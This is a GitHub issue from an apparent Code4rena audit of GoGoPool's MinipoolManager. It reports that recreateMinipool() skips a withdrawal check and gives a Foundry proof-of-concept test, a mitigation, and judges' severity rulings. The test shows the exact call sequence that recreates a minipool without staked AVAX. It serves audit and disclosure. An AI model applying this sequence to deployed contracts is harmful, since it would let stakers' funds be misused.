Can create minipool without staking #439

code423n4 · 2023-01-02T14:35:56Z

Lines of code

https://github.com/code-423n4/2022-12-gogopool/blob/aec9928d8bdce8a5a4efe45f54c39d4fc7313731/contracts/contract/MinipoolManager.sol#L442-L478

Vulnerability details

Impact

minipool can be created without staking AVAX with recreateMinipool(). recreateMinipool() function doesn't check if the owner withdrew or not.

Proof of Concept

I just added withdrawMinipoolFunds() to the original test.

function testRecreateMinipool() public {
		uint256 duration = 4 weeks;
		uint256 depositAmt = 1000 ether;
		uint256 avaxAssignmentRequest = 1000 ether;
		uint256 validationAmt = depositAmt + avaxAssignmentRequest;
		// Enough to start but not to re-stake, we will add more later
		uint128 ggpStakeAmt = 100 ether;

		vm.startPrank(nodeOp);
		
		ggp.approve(address(staking), MAX_AMT);
		staking.stakeGGP(ggpStakeAmt);
		MinipoolManager.Minipool memory mp = createMinipool(depositAmt, avaxAssignmentRequest, duration);
		console.log("balance1", nodeOpBalance);
		vm.stopPrank();

		address liqStaker1 = getActorWithTokens("liqStaker1", MAX_AMT, MAX_AMT);
		vm.prank(liqStaker1);
		ggAVAX.depositAVAX{value: MAX_AMT}();

		vm.prank(address(rialto));
		minipoolMgr.claimAndInitiateStaking(mp.nodeID);

		bytes32 txID = keccak256("txid");
		vm.prank(address(rialto));
		minipoolMgr.recordStakingStart(mp.nodeID, txID, block.timestamp);

		skip(duration / 2);

		// Give rialto the rewards it needs
		uint256 rewards = 10 ether;
		deal(address(rialto), address(rialto).balance + rewards);

		// Pay out the rewards
		vm.prank(address(rialto));
		minipoolMgr.recordStakingEnd{value: validationAmt + rewards}(mp.nodeID, block.timestamp, rewards);

		// Now try to restake
		vm.expectRevert(MinipoolManager.InvalidMultisigAddress.selector);
		minipoolMgr.recreateMinipool(mp.nodeID);

		vm.prank(address(rialto));
		vm.expectRevert(MinipoolManager.InsufficientGGPCollateralization.selector);
		minipoolMgr.recreateMinipool(mp.nodeID);

		// Add a bit more collateral to cover the compounding rewards
		vm.startPrank(nodeOp);
		staking.stakeGGP(1 ether);
		minipoolMgr.withdrawMinipoolFunds(mp.nodeID);
		vm.stopPrank();

		vm.prank(address(rialto));
		minipoolMgr.recreateMinipool(mp.nodeID);

		console.log("staking.getAVAXStake(mp.owner) :", staking.getAVAXStake(mp.owner) / 1e18);

		//MinipoolManager.Minipool memory mpCompounded = minipoolMgr.getMinipoolByNodeID(mp.nodeID);
		//assertEq(mpCompounded.status, uint256(MinipoolStatus.Prelaunch));
		//assertGt(mpCompounded.avaxNodeOpAmt, mp.avaxNodeOpAmt);
		//assertGt(mpCompounded.avaxNodeOpAmt, mp.avaxNodeOpInitialAmt);
		//assertGt(mpCompounded.avaxLiquidStakerAmt, mp.avaxLiquidStakerAmt);
		//assertEq(staking.getAVAXStake(mp.owner), mpCompounded.avaxNodeOpAmt);
		//assertEq(staking.getAVAXAssigned(mp.owner), mpCompounded.avaxLiquidStakerAmt);
		//assertEq(staking.getMinipoolCount(mp.owner), 1);
		//assertEq(mpCompounded.startTime, 0);
		//assertGt(mpCompounded.initialStartTime, 0);
	}

Tools Used

Foundry

Recommended Mitigation Steps

recreateMinipool() needs check staking balance before increaseAVAXStake().

The text was updated successfully, but these errors were encountered:

GalloDaSballo · 2023-01-10T20:55:18Z

Dup of #484 but without Front-run aspect, awarding half

c4-judge · 2023-01-10T20:55:26Z

GalloDaSballo marked the issue as duplicate of #484

c4-judge · 2023-01-10T20:55:34Z

GalloDaSballo marked the issue as partial-50

c4-judge · 2023-02-03T12:41:09Z

GalloDaSballo marked the issue as duplicate of #569

c4-judge · 2023-02-08T08:27:15Z

GalloDaSballo changed the severity to 2 (Med Risk)

c4-judge · 2023-02-09T08:45:54Z

GalloDaSballo changed the severity to QA (Quality Assurance)

Simon-Busch · 2023-02-09T12:34:52Z

Changed the severity back to M as requested by @GalloDaSballo

code423n4 added 3 (High Risk) Assets can be stolen/lost/compromised directly bug Something isn't working labels Jan 2, 2023

code423n4 added a commit that referenced this issue Jan 2, 2023

Nyx issue #439

c9339fe

C4-Staff added a commit that referenced this issue Jan 6, 2023

original risk added for issue #439

ff52d59

c4-judge closed this as completed Jan 10, 2023

c4-judge added the duplicate-484 label Jan 10, 2023

c4-judge added the partial-50 Incomplete articulation of vulnerability; eligible for partial credit only (50%) label Jan 10, 2023

c4-judge added QA (Quality Assurance) Assets are not at risk. State handling, function incorrect as to spec, issues with clarity, syntax and removed 2 (Med Risk) Assets not at direct risk, but function/availability of the protocol could be impacted or leak value labels Feb 9, 2023

Simon-Busch added 2 (Med Risk) Assets not at direct risk, but function/availability of the protocol could be impacted or leak value and removed QA (Quality Assurance) Assets are not at risk. State handling, function incorrect as to spec, issues with clarity, syntax labels Feb 9, 2023

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Can create minipool without staking #439

Can create minipool without staking #439

code423n4 commented Jan 2, 2023

GalloDaSballo commented Jan 10, 2023

c4-judge commented Jan 10, 2023

c4-judge commented Jan 10, 2023

c4-judge commented Feb 3, 2023

c4-judge commented Feb 8, 2023

c4-judge commented Feb 9, 2023

Simon-Busch commented Feb 9, 2023

Can create minipool without staking #439

Can create minipool without staking #439

Comments

code423n4 commented Jan 2, 2023

Lines of code

Vulnerability details

Impact

Proof of Concept

Tools Used

Recommended Mitigation Steps

GalloDaSballo commented Jan 10, 2023

c4-judge commented Jan 10, 2023

c4-judge commented Jan 10, 2023

c4-judge commented Feb 3, 2023

c4-judge commented Feb 8, 2023

c4-judge commented Feb 9, 2023

Simon-Busch commented Feb 9, 2023